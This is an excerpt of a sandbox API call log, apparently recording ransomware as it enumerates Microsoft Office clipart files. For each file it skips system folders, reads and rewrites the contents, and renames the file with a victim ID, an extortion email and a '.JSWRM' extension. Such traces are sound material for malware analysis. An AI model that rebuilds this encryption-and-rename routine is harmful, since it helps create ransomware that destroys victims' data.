lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0094.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0094.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0094.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0094.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0094.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0094.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0094.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0094.816] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8795, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02749G.GIF", cAlternateFileName="")) returned 1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2=".") returned 1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="..") returned 1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="...") returned 1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="windows") returned -1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="recovery") returned -1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="perflogs") returned 1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="documents and settings") returned 1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="system volume information") returned -1 [0094.816] lstrcmpiW (lpString1="PH02749G.GIF", lpString2="msocache") returned 1 [0094.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0094.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02749G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0094.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0094.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02749G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0094.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0094.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0094.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.817] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=34709) returned 1 [0094.817] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8790) returned 0x24d210 [0094.818] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8790, lpOverlapped=0x0) returned 1 [0094.822] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.822] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8790, lpOverlapped=0x0) returned 1 [0094.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.823] CloseHandle (hObject=0x314) returned 1 [0094.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0094.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0094.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0094.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0094.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0094.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0094.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0094.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0094.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0094.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0094.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0094.824] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8118, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02749U.BMP", cAlternateFileName="")) returned 1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2=".") returned 1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="..") returned 1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="...") returned 1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="windows") returned -1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="recovery") returned -1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="perflogs") returned 1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="documents and settings") returned 1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="system volume information") returned -1 [0094.824] lstrcmpiW (lpString1="PH02749U.BMP", lpString2="msocache") returned 1 [0094.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0094.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02749U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0094.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0094.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02749U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02749U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0094.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0094.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0094.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0094.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.825] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33048) returned 1 [0094.825] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8110) returned 0x24d210 [0094.826] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8110, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8110, lpOverlapped=0x0) returned 1 [0094.829] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.830] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8110, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8110, lpOverlapped=0x0) returned 1 [0094.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.830] CloseHandle (hObject=0x314) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0094.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0094.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0094.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0094.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0094.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0094.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0094.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.831] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0094.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0094.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0094.959] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1025500d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1025500d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64c7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02750G.GIF", cAlternateFileName="")) returned 1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2=".") returned 1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="..") returned 1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="...") returned 1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="windows") returned -1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="recovery") returned -1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="perflogs") returned 1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="documents and settings") returned 1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="system volume information") returned -1 [0094.959] lstrcmpiW (lpString1="PH02750G.GIF", lpString2="msocache") returned 1 [0094.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0094.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02750G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0094.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0094.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02750G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0094.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0094.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0094.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0094.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.961] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25799) returned 1 [0094.961] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x64c0) returned 0x24d210 [0094.961] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x64c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x64c0, lpOverlapped=0x0) returned 1 [0094.965] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.965] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x64c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x64c0, lpOverlapped=0x0) returned 1 [0094.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.965] CloseHandle (hObject=0x314) returned 1 [0094.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0094.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0094.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0094.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0094.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0094.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0094.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.966] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0094.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0094.967] HeapFree (in: hHeap=0x1e0000, 